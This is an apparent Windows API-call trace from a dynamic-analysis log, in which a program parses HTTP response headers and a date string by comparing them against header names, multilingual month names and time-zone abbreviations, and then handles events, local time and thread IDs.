CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Length", cchCount2=14) returned 1 [0103.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Length", cchCount2=14) returned 1 [0103.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Length", cchCount2=14) returned 3 [0103.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Length", cchCount2=14) returned 1 [0103.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Range", cchCount2=13) returned 3 [0103.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Range", cchCount2=13) returned 3 [0103.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Transfer-Encoding", cchCount1=17, lpString2="Content-Range", cchCount2=13) returned 3 [0103.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Range", cchCount2=13) returned 1 [0103.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Set-Cookie", cchCount1=10, lpString2="Content-Range", cchCount2=13) returned 3 [0103.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Range", cchCount2=13) returned 3 [0103.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Access-Control-Allow-Origin", cchCount1=27, lpString2="Content-Range", cchCount2=13) returned 1 [0103.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cache-control", cchCount1=13, lpString2="Content-Range", cchCount2=13) returned 1 [0103.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X-IPLB-Instance", cchCount1=15, lpString2="Content-Range", cchCount2=13) returned 3 [0103.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-Cache-Status", cchCount1=15, lpString2="Content-Range", cchCount2=13) returned 1 [0103.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Age", cchCount1=3, lpString2="Content-Range", cchCount2=13) returned 1 [0103.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Range", cchCount2=13) returned 3 [0103.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CF-RAY", cchCount1=6, lpString2="Content-Range", cchCount2=13) returned 1 [0103.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Date", cchCount2=4) returned 2 [0103.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mon", cchCount1=3, lpString2="SUN", cchCount2=3) returned 1 [0103.105] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mon", cchCount1=3, lpString2="MON", cchCount2=3) returned 2 [0103.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JAN", cchCount2=3) returned 1 [0103.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FEB", cchCount2=3) returned 1 [0103.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAR", cchCount2=3) returned 1 [0103.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="APR", cchCount2=3) returned 1 [0103.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAY", cchCount2=3) returned 1 [0103.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUN", cchCount2=3) returned 1 [0103.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUL", cchCount2=3) returned 1 [0103.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AUG", cchCount2=3) returned 1 [0103.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SEP", cchCount2=3) returned 1 [0103.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OCT", cchCount2=3) returned 1 [0103.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="NOV", cchCount2=3) returned 1 [0103.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DEC", cchCount2=3) returned 1 [0103.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUNE", cchCount2=4) returned 1 [0103.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JULY", cchCount2=4) returned 1 [0103.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SEPT", cchCount2=4) returned 1 [0103.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MRZ", cchCount2=3) returned 1 [0103.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAI", cchCount2=3) returned 1 [0103.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.106] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OKT", cchCount2=3) returned 1 [0103.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DEZ", cchCount2=3) returned 1 [0103.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="ENO", cchCount2=3) returned 1 [0103.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FBRO", cchCount2=4) returned 1 [0103.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MZO", cchCount2=3) returned 1 [0103.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AB", cchCount2=2) returned 1 [0103.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AGTO", cchCount2=4) returned 1 [0103.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SBRE", cchCount2=4) returned 1 [0103.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OBRE", cchCount2=4) returned 1 [0103.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="NBRE", cchCount2=4) returned 1 [0103.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DBRE", cchCount2=4) returned 1 [0103.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MRT", cchCount2=3) returned 1 [0103.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MEI", cchCount2=3) returned 1 [0103.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OKT", cchCount2=3) returned 1 [0103.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JANV", cchCount2=4) returned 1 [0103.107] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FÉV", cchCount2=3) returned 1 [0103.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MARS", cchCount2=4) returned 1 [0103.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AVR", cchCount2=3) returned 1 [0103.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAI", cchCount2=3) returned 1 [0103.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUIN", cchCount2=4) returned 1 [0103.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUIL", cchCount2=4) returned 1 [0103.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AOÛ", cchCount2=3) returned 1 [0103.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SEPT", cchCount2=4) returned 1 [0103.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DÉC", cchCount2=3) returned 1 [0103.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FÉVR", cchCount2=4) returned 1 [0103.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUI", cchCount2=3) returned 1 [0103.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AOÛT", cchCount2=4) returned 1 [0103.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAJ", cchCount2=3) returned 1 [0103.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AVG", cchCount2=3) returned 1 [0103.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0103.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mar", cchCount1=3, lpString2="JAN", cchCount2=3) returned 3 [0103.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mar", cchCount1=3, lpString2="FEB", cchCount2=3) returned 3 [0103.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mar", cchCount1=3, lpString2="MAR", cchCount2=3) returned 2 [0103.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="A", cchCount2=1) returned 3 [0103.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ACDT", cchCount2=4) returned 3 [0103.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ACST", cchCount2=4) returned 3 [0103.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ACT", cchCount2=3) returned 3 [0103.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ADT", cchCount2=3) returned 3 [0103.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AEDT", cchCount2=4) returned 3 [0103.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AEST", cchCount2=4) returned 3 [0103.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AFT", cchCount2=3) returned 3 [0103.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AKDT", cchCount2=4) returned 3 [0103.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AKST", cchCount2=4) returned 3 [0103.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMST", cchCount2=4) returned 3 [0103.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMST", cchCount2=4) returned 3 [0103.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMT", cchCount2=3) returned 3 [0103.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMT", cchCount2=3) returned 3 [0103.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ART", cchCount2=3) returned 3 [0103.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AST", cchCount2=3) returned 3 [0103.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AST", cchCount2=3) returned 3 [0103.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AWDT", cchCount2=4) returned 3 [0103.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AWST", cchCount2=4) returned 3 [0103.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AZOST", cchCount2=5) returned 3 [0103.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AZT", cchCount2=3) returned 3 [0103.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="B", cchCount2=1) returned 3 [0103.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BDT", cchCount2=3) returned 3 [0103.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BIOT", cchCount2=4) returned 3 [0103.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BIT", cchCount2=3) returned 3 [0103.109] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BOT", cchCount2=3) returned 3 [0103.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BRT", cchCount2=3) returned 3 [0103.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BST", cchCount2=3) returned 3 [0103.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BST", cchCount2=3) returned 3 [0103.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BTT", cchCount2=3) returned 3 [0103.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="C", cchCount2=1) returned 3 [0103.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CAT", cchCount2=3) returned 3 [0103.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CCT", cchCount2=3) returned 3 [0103.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CDT", cchCount2=3) returned 3 [0103.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CDT", cchCount2=3) returned 3 [0103.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CEDT", cchCount2=4) returned 3 [0103.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CEST", cchCount2=4) returned 3 [0103.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CET", cchCount2=3) returned 3 [0103.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHADT", cchCount2=5) returned 3 [0103.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHAST", cchCount2=5) returned 3 [0103.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHOT", cchCount2=4) returned 3 [0103.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ChST", cchCount2=4) returned 3 [0103.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHUT", cchCount2=4) returned 3 [0103.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CIST", cchCount2=4) returned 3 [0103.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CIT", cchCount2=3) returned 3 [0103.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CKT", cchCount2=3) returned 3 [0103.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CLST", cchCount2=4) returned 3 [0103.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CLT", cchCount2=3) returned 3 [0103.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="COST", cchCount2=4) returned 3 [0103.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="COT", cchCount2=3) returned 3 [0103.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CST", cchCount2=3) returned 3 [0103.110] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CST", cchCount2=3) returned 3 [0103.110] GetTimeZoneInformation (in: lpTimeZoneInformation=0x19faa8 | out: lpTimeZoneInformation=0x19faa8) returned 0x1 [0103.111] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x3f0 [0103.111] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3f4 [0103.111] GetLocalTime (in: lpSystemTime=0x19fb98 | out: lpSystemTime=0x19fb98*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x0, wMilliseconds=0x216)) [0103.111] GetTimeZoneInformation (in: lpTimeZoneInformation=0x19f9b0 | out: lpTimeZoneInformation=0x19f9b0) returned 0x1 [0103.111] GetLocalTime (in: lpSystemTime=0x19fb6c | out: lpSystemTime=0x19fb6c*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x0, wMilliseconds=0x216)) [0103.111] GetCurrentThreadId () returned 0x1358 [0103.111] GetCurrentThreadId () returned 0x1358 [0103.111] GetCurrentThreadId () returned 0x1358 [0103.111] GetCurrentThreadId () returned 0x1358 [0103.111] ResetEvent (hEvent=0x3f0) returned 1 [0103.111] GetCurrentThreadId () returned 0x1358 [0103.111] GetCurrentThreadId () returned 0x1358 [0103.111] GetCurrentThreadId () returned 0x1358 [0103.111] ResetEvent (hEvent=0x3f0) returned 1 [0103.111] GetLocalTime (in: lpSystemTime=0x19fb80 | out: lpSystemTime=0x19fb80*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x1, wDay=0x10, wHour=0x9, wMinute=0x29, wSecond=0x0, wMilliseconds=0x216)) [0103.111] GetCurrentThreadId () returned 0x1358 [0103.111] GetCurrentThreadId () returned 0x1358 [0103.111] SetEvent (hEvent=0x3f4) returned 1 [0103.111] SetEvent (hEvent=0x3f0) returned 1 [0103.111] GetCurrentThreadId () returned 0x1358 [0103.111] GetCurrentThreadId () returned 0x1358 [0103.111] GetCurrentThreadId () returned 0x1358 [0103.111] LoadStringW (in: hInstance=0x400000, uID=0xfebf, lpBuffer=0x19db68, cchBufferMax=4096 | out: lpBuffer="Chunk Started") returned 0xd [0103.111] GetTickCount64 () returned 0x115b12c [0103.111] GetTickCount64 () returned 0x115b12c [0103.112] GetTickCount64 () returned 0x115b12c [0103.112] GetTickCount64 () returned 0x115b12c [0103.112] select (in: nfds=0, readfds=0x19fa88, writefds=0x0, exceptfds=0x0, timeout=0x19fa70*(tv_sec=0, tv_usec=0) | out: readfds=0x19fa88, writefds=0x0, exceptfds=0x0) returned 0 [0103.112] select (in: nfds=0, readfds=0x19fa88, writefds=0x0, exceptfds=0x0, timeout=0x19fa70*(tv_sec=0, tv_usec=0) | out: readfds=0x19fa88, writefds=0x0, exceptfds=0x0) returned 0 [0103.112] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="keep-alive", cchCount1=10, lpString2="CLOSE", cchCount2=5) returned 3 [0103.112] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="CLOSE", cchCount2=5) returned 1 [0103.112] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x242e938, cbMultiByte=2, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 2 [0103.112] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x242e938, cbMultiByte=2, lpWideCharStr=0x2483e34, cchWideChar=2 | out: lpWideCharStr="DE") returned 2 [0103.112] GetCurrentThreadId () returned 0x1358 [0103.112] GetCurrentThreadId () returned 0x1358 [0103.112] GetCurrentThreadId () returned 0x1358 [0103.112] GetCurrentThreadId () returned 0x1358 [0103.112] GetCurrentThreadId () returned 0x1358 [0103.112] GetCurrentThreadId () returned 0x1358 [0103.112] GetCurrentThreadId () returned 0x1358 [0103.112] GetCurrentThreadId () returned 0x1358 [0103.112] GetCurrentThreadId () returned 0x1358 [0103.112] GetCurrentThreadId () returned 0x1358 [0103.112] GetCurrentThreadId () returned 0x1358 [0103.112] GetCurrentThreadId () returned 0x1358 [0103.112] GetCurrentThreadId () returned 0x1358 [0103.112] GetCurrentThreadId () returned 0x1358 [0103.112] GetCurrentThreadId () returned 0x1358 [0103.112] GetCurrentThreadId () returned 0x1358 [0103.112] GetCurrentThreadId () returned 0x1358 [0103.112] GetCurrentThreadId () returned 0x1358 [0103.112] GetCurrentThreadId () returned 0x1358 [0103.112] GetCurrentThreadId () returned 0x1358 [0103.112] GetCurrentThreadId () returned 0x1358 [0103.112] GetCurrentThreadId () returned 0x1358 [0103.112] GetCurrentThreadId () returned 0x1358 [0103.112] GetCurrentThreadId () returned 0x1358 [0103.112] GetCurrentThreadId () returned 0x1358 [0103.113] GetCurrentThreadId () returned 0x1358 [0103.113] GetCurrentThreadId () returned 0x1358 [0103.113] GetCurrentThreadId () returned 0x1358 [0103.113] GetCurrentThreadId () returned 0x1358 [0103.113] GetCurrentThreadId () returned 0x1358 [0103.113] GetCurrentThreadId () returned 0x1358 [0103.113] GetCurrentThreadId () returned 0x1358 [0103.113] GetCurrentThreadId () returned 0x1358 [0103.113] GetCurrentThreadId () returned 0x1358 [0103.113] GetCurrentThreadId () returned 0x1358 [0103.113] GetCurrentThreadId () returned 0x1358 [0103.113] GetCurrentThreadId () returned 0x1358 [0103.113] GetCurrentThreadId () returned 0x1358 